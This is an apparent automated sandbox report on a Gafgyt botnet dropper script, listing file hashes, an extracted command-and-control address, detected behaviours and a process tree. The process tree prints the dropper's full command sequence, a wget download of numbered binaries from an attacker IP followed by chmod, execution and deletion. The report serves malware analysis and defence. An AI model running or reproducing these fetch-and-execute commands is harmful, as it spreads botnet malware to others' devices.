Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18-02-2025 06:12
Static task
static1
Behavioral task
behavioral1
Sample
logsbins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
logsbins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
logsbins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
logsbins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
logsbins.sh
-
Size
1KB
-
MD5
98c9c49189a0b83044691596678fd48f
-
SHA1
e859d05cb239c5e54be4aec9328b60f146200034
-
SHA256
cb80b4c67663965af99ad05e7e9de251770b96f76e07bc8d8053777ec225b5d6
-
SHA512
6f2e41ee1ce7e1610d03ad561ab1bec0ddeddfa22cf332c540f5e85de75bde6abaee891cb9f070c7b4845fca158cd42249d3f0cba36e9f482d46026d1f98bd4e
Malware Config
Extracted
gafgyt
185.74.222.38:8080
Signatures
-
Detected Gafgyt variant 14 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_gafgyt behavioral2/files/fstream-2.dat family_gafgyt behavioral2/files/fstream-3.dat family_gafgyt behavioral2/files/fstream-4.dat family_gafgyt behavioral2/files/fstream-5.dat family_gafgyt behavioral2/files/fstream-6.dat family_gafgyt behavioral2/files/fstream-7.dat family_gafgyt behavioral2/files/fstream-8.dat family_gafgyt behavioral2/files/fstream-9.dat family_gafgyt behavioral2/files/fstream-10.dat family_gafgyt behavioral2/files/fstream-11.dat family_gafgyt behavioral2/files/fstream-12.dat family_gafgyt behavioral2/files/fstream-13.dat family_gafgyt behavioral2/files/fstream-14.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 693 chmod 702 chmod 736 chmod 782 chmod 832 chmod 717 chmod 810 chmod 827 chmod 851 chmod 776 chmod 677 chmod 755 chmod 795 chmod 836 chmod 841 chmod 846 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/b 694 logsbins.sh /tmp/c 703 logsbins.sh /tmp/d 719 logsbins.sh /tmp/e 738 logsbins.sh /tmp/f 756 logsbins.sh /tmp/g 777 logsbins.sh /tmp/h 783 logsbins.sh /tmp/i 796 logsbins.sh /tmp/j 811 logsbins.sh /tmp/k 828 logsbins.sh /tmp/m 837 logsbins.sh /tmp/n 842 logsbins.sh /tmp/o 847 logsbins.sh /tmp/p 852 logsbins.sh -
Writes DNS configuration 1 TTPs 4 IoCs
Writes data to DNS resolver config file.
description ioc Process File opened for modification /etc/resolv.conf b File opened for modification /etc/resolv.conf c File opened for modification /etc/resolv.conf d File opened for modification /etc/resolv.conf e -
Changes its process name 4 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 694 b Changes the process name, possibly in an attempt to hide itself 703 c Changes the process name, possibly in an attempt to hide itself 719 d Changes the process name, possibly in an attempt to hide itself 738 e -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/f wget File opened for modification /tmp/j wget File opened for modification /tmp/k wget File opened for modification /tmp/o wget File opened for modification /tmp/b wget File opened for modification /tmp/c wget File opened for modification /tmp/d wget File opened for modification /tmp/e wget File opened for modification /tmp/n wget File opened for modification /tmp/g wget File opened for modification /tmp/h wget File opened for modification /tmp/i wget File opened for modification /tmp/m wget File opened for modification /tmp/p wget
Processes
-
/tmp/logsbins.sh/tmp/logsbins.sh1⤵
- Executes dropped EXE
PID:660 -
/usr/bin/wgetwget http://194.32.145.243/a2⤵PID:662
-
-
/bin/chmodchmod +x a2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/a./a2⤵PID:680
-
-
/bin/rmrm -rf a2⤵PID:681
-
-
/usr/bin/wgetwget http://194.32.145.243/b2⤵
- Writes file to tmp directory
PID:683
-
-
/bin/chmodchmod +x b2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/b./b2⤵
- Writes DNS configuration
- Changes its process name
PID:694
-
-
/bin/rmrm -rf b2⤵PID:697
-
-
/usr/bin/wgetwget http://194.32.145.243/c2⤵
- Writes file to tmp directory
PID:701
-
-
/bin/chmodchmod +x c2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/c./c2⤵
- Writes DNS configuration
- Changes its process name
PID:703
-
-
/bin/rmrm -rf c2⤵PID:706
-
-
/usr/bin/wgetwget http://194.32.145.243/d2⤵
- Writes file to tmp directory
PID:709
-
-
/bin/chmodchmod +x d2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/d./d2⤵
- Writes DNS configuration
- Changes its process name
PID:719
-
-
/bin/rmrm -rf d2⤵PID:722
-
-
/usr/bin/wgetwget http://194.32.145.243/e2⤵
- Writes file to tmp directory
PID:725
-
-
/bin/chmodchmod +x e2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/e./e2⤵
- Writes DNS configuration
- Changes its process name
PID:738
-
-
/bin/rmrm -rf e2⤵PID:741
-
-
/usr/bin/wgetwget http://194.32.145.243/f2⤵
- Writes file to tmp directory
PID:745
-
-
/bin/chmodchmod +x f2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/f./f2⤵PID:756
-
-
/bin/rmrm -rf f2⤵PID:761
-
-
/usr/bin/wgetwget http://194.32.145.243/g2⤵
- Writes file to tmp directory
PID:763
-
-
/bin/chmodchmod +x g2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/g./g2⤵PID:777
-
-
/bin/rmrm -rf g2⤵PID:779
-
-
/usr/bin/wgetwget http://194.32.145.243/h2⤵
- Writes file to tmp directory
PID:780
-
-
/bin/chmodchmod +x h2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/h./h2⤵PID:783
-
-
/bin/rmrm -rf h2⤵PID:785
-
-
/usr/bin/wgetwget http://194.32.145.243/i2⤵
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod +x i2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/i./i2⤵PID:796
-
-
/bin/rmrm -rf i2⤵PID:798
-
-
/usr/bin/wgetwget http://194.32.145.243/j2⤵
- Writes file to tmp directory
PID:799
-
-
/bin/chmodchmod +x j2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/j./j2⤵PID:811
-
-
/bin/rmrm -rf j2⤵PID:813
-
-
/usr/bin/wgetwget http://194.32.145.243/k2⤵
- Writes file to tmp directory
PID:815
-
-
/bin/chmodchmod +x k2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/k./k2⤵PID:828
-
-
/bin/rmrm -rf k2⤵PID:830
-
-
/usr/bin/wgetwget http://194.32.145.243/l2⤵PID:831
-
-
/bin/chmodchmod +x l2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/l./l2⤵PID:833
-
-
/bin/rmrm -rf l2⤵PID:834
-
-
/usr/bin/wgetwget http://194.32.145.243/m2⤵
- Writes file to tmp directory
PID:835
-
-
/bin/chmodchmod +x m2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/m./m2⤵PID:837
-
-
/bin/rmrm -rf m2⤵PID:839
-
-
/usr/bin/wgetwget http://194.32.145.243/n2⤵
- Writes file to tmp directory
PID:840
-
-
/bin/chmodchmod +x n2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/n./n2⤵PID:842
-
-
/bin/rmrm -rf n2⤵PID:844
-
-
/usr/bin/wgetwget http://194.32.145.243/o2⤵
- Writes file to tmp directory
PID:845
-
-
/bin/chmodchmod +x o2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/o./o2⤵PID:847
-
-
/bin/rmrm -rf o2⤵PID:849
-
-
/usr/bin/wgetwget http://194.32.145.243/p2⤵
- Writes file to tmp directory
PID:850
-
-
/bin/chmodchmod +x p2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/p./p2⤵PID:852
-
-
/bin/rmrm -rf p2⤵PID:854
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
125KB
MD52a31822212e31bdba97c2b77d81ae55f
SHA1f79bf0f316ca76b6710e2f45a57ae85b4d4ce9eb
SHA2563786ea07da754523923421729dc438b79e8e920eff1b436c762667567b7c7d30
SHA5127381d850e04ead1a5f85e1b104d7a4c041f7e106d64a7ee34b372b419057dbeb15f7ede38ec722bda0a3d35bb3d35c1a24e5de70740720bed7e22b668fa17d0f
-
Filesize
117KB
MD55fde5dc82bcb4337a9452b7603883cbd
SHA1b783a02f7d5187371360d572ccfc50988be8b8e1
SHA25612d1c088b1ab362a3469ef57c595247ad59f05187c0c5c0137eba913dc490fe2
SHA512bc412ad0ddd185c83a4458f23e8433f86fcc10b2beb4f269551d1939a35fcee1e04df1c92e29105d2649831123d5682ea2f6c8687e949931102b5e02a066b60f
-
Filesize
139KB
MD59574c6e15b3cd6a99216d69a5e67098c
SHA1508e4c6e40bbdbe55a317f658da3c572fc716513
SHA256efb7c3a4e5fd61c890c19f1863106ca95a95732a483f8e80c2c2fe92bfe64421
SHA512509a0df503d97d781fb4c14843fa9d343a70f44093919bcbdf69c9a113ce53c6d8834e4e99913c83f8cc572af0ce46ba427183fedb80e0fa2f7ab433e35303a5
-
Filesize
175KB
MD59c779dd03f0116c1db1af160a39b05d6
SHA11a6b6a6b6121d94f0c6f1d842be8ead9ffb18ae1
SHA256bbd91c692d5e0754e82a982e7d6f2a4dcbfdd5af5e3d8819a8aec4203e1de83c
SHA512cb53a8362708f1f9210aad22e80a6a1d2ca152c9f021a42a1248aef85813d0c853bb449121a9aef1b292e886ccc758f2cbdaa6097ff92010514d711da983f544
-
Filesize
99KB
MD5c8796f9714f4a298f1aae8c4b643e830
SHA120f206435f4175f2297a5a9a8fc8ae7ec806f915
SHA256badba6f6bacc30c35eb145821817a19db68735d37380979805786d364f8d0cbd
SHA512e86dc78f76e94aad1c8da9e693d4d9d193cb759ecbe71398285a23393ed6630bb9cfa5acb5d90bb8e7d34564b4342f418878f3932b4a2e811f287de6c057c0cb
-
Filesize
97KB
MD5c16c1a8c7cc13ad721eb2e399958ca6a
SHA112b0550a80ce2a65ef82ade7b84ae27df56b7b66
SHA256ebf742b55a85955424ecc3864ce3248b5ce63263d5237e18490a12c723ad6eb2
SHA512267404dcdf4949ff4d006b336508a380975c67bfda5af24dcfea1f971a4994670b28c7b607abd289112a256a2e5153d8c1afb117d8c980162fb60dbab16a43b2
-
Filesize
97KB
MD57ad8966e2134aed972b9e7e608f44740
SHA1c3490fca6ca16732fa6cedb7b2c03a161e120238
SHA256a7522577f8d5427a39b07628b69b0691b30317df0f225d7e24b09e1760ebe724
SHA512047777a46117fa5419b2c8aaaea635eb2d209afff8bc516c8652eeca624a86e961e1d568fd9d3fcf543afd60f262e8857a93dddcc7bb91c2acdc66f5bf20c34e
-
Filesize
115KB
MD5421be8bebbf3b2449d403771c55aad14
SHA1f9a06280e4a9bdf064a09e1144dfe90785652a87
SHA256183c621a08e080617fdaa48eed29de6334b0715ecd52b571daac83f4aae4be28
SHA5121401fc817a75aa509ecb38f080103f55cdc06c5a1b6fe976df2c74a1d019282843ae888ab40096a4baabf9b347553d38814487b95ce1389e2019d3435005c776
-
Filesize
150KB
MD51436c169550ade43b1aaaa4cb9d705de
SHA1f43f76d7c9f4885edc6698153669baec6400c25a
SHA25609b543c8b2c72e070716802d48686208d16054258964c1b1e15db819b123d092
SHA51264ecdfc4df41090d607a5d963d660e7c5b1dd3047b6774f1630af8072f7e3045fcfa1363a85e03cca4387483a647868d362c630eddf7ed5367125ad50c4204d5
-
Filesize
150KB
MD5d27ba0aebc1887fb23c43187a1eb3d95
SHA1aab111ba9f35ee1fbca34f808a05a7c31252c252
SHA256ef22559baf89f4bc9af7222a687edf9e91b8e69fe743ae25559f5c6b61d9362d
SHA512c2eea705d332417b7a20d3451a4077dd10bd05d1304296b9ccfdd5c137e15d584961d9b992d82e5d6aaa0fd4c90b4e2d202d6ca855fe4766b9031d28cd95d0a3
-
Filesize
113KB
MD502a0410937d42f09ab82dace35329058
SHA1244930375901ffb88341fcac57ccae3bfad4e7f2
SHA256adb653bddf3cca64bad1793ed255b93578631f74e4ce88065b9eb4a63f197940
SHA5120e985cf5acc730a518bc3fc97f1f9eb618abda1ae34c4b60198ccf9785e0e921402a7617ce13b9b1527361e81e8b5752004517fa9257d4182807a693ac24cca3
-
Filesize
105KB
MD572e86594ce066886869fd6047372b050
SHA105b1ac7ea86a8a2fc43fc79661669bd9d36595f7
SHA256c6aedfe25c51288d7f93da8812dbd1aef030c7bd682492637fe1a7d02fee1977
SHA512121e4dd49238dab0d9c9070b5159de7719ccc441cfc04cc9792a102b2cc7615b442033337d137cd889d97ba218ec5bdbcfb5e0b470bf0224dcd7e2adcc2531b1
-
Filesize
123KB
MD5f7d5f4c3a101fbe0a18e28d1e0dc5493
SHA11ac5190b66232a83cca200f651ed2b080a0382d0
SHA25631100b61c98e672255bfe6d40369799d766b6b96b1efb4ce2c49747efdf8ab7e
SHA512dad5dd54d0f39c5d9f579281e38ffefb935300c02c41abfb88a360b4252513c7b70a30215a4786ffae745d6851011fb2b16172aa971ef8ca191a9052fb1866c4
-
Filesize
109KB
MD53899fd75311d4b34aad8db2d1a4b3b03
SHA19673fc5503f1342822d325ab784c1b20f03b2a2e
SHA2564c96e9af9a3092ce59c8f49474370e7286c41e07c6d9af6140088174d19c0ea2
SHA51212ce22069821a591a8e0de562a60b68573f44cd195cea66b9b4f676b4baaa606283e9edcbdc655252630aec8109b805f5aefbb1239397e389116d53102fe5a81